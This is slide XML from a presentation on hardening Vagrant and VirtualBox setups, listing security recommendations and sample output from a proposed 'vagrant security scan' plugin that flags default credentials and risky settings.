                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Guest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Additions</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="327660" indent="-199390">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="330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28295" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Keep </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-135" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Up </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Date </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on Latest </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Security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Information</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="105410" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="150" baseline="13888" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Update </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VirtualBox </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Guest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Additions</a:t>
            </a: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720"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>see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spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.virtualbox.org/manual/ch13.html</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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65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417" y="190436"/>
            <a:ext cx="2361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E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-245" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-165" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>RECOMMENDATIONS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467" y="699201"/>
            <a:ext cx="225679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1200" spc="-130" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Recommendations </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>running</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Vagrant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60"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-140" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Attitude</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Don’t </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Rely </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On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Defaults</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Don’t </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-135" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-145" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>As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20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Root</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="334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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Don’t </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boxes From </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3rd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10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Parties</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="330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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Always </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Check </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The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10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VagrantFiles</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" marR="158750" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="102699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Always </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Communication  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Channels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9652" y="973731"/>
            <a:ext cx="2198370" cy="19157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145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Configuration</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="334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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Root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145" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SSH-Access</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="330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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Root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130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant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30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Secure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160" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SSH-Keys</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="334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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Default </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant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130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Share</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="330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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Default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10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Restrict </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Port-Forwarding </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to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Localhost</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="314960" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335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15595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-120" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Local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User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66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589" y="190436"/>
            <a:ext cx="4254500" cy="2947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F8007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>THE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-204" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-145" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>FUTURE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120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Plugin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100" spc="-204" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Command: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spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>scan</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>options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]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150" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Result: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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>w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] </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Current </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>user is able to run</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="90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sudo.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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>i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] </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Default </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>share</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="90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disabled.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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>!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] </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>access with default credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10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detected.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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>!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] </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>access with default credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>detected.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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>i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] </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>SSH secure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>keys </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>are used.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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>w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] </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Vagrantile </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>discovered </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>on box at </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>/home/w00t/Vagrantile.</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>w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] </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>is running within public</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:latin typeface="LM Roman 9"/>
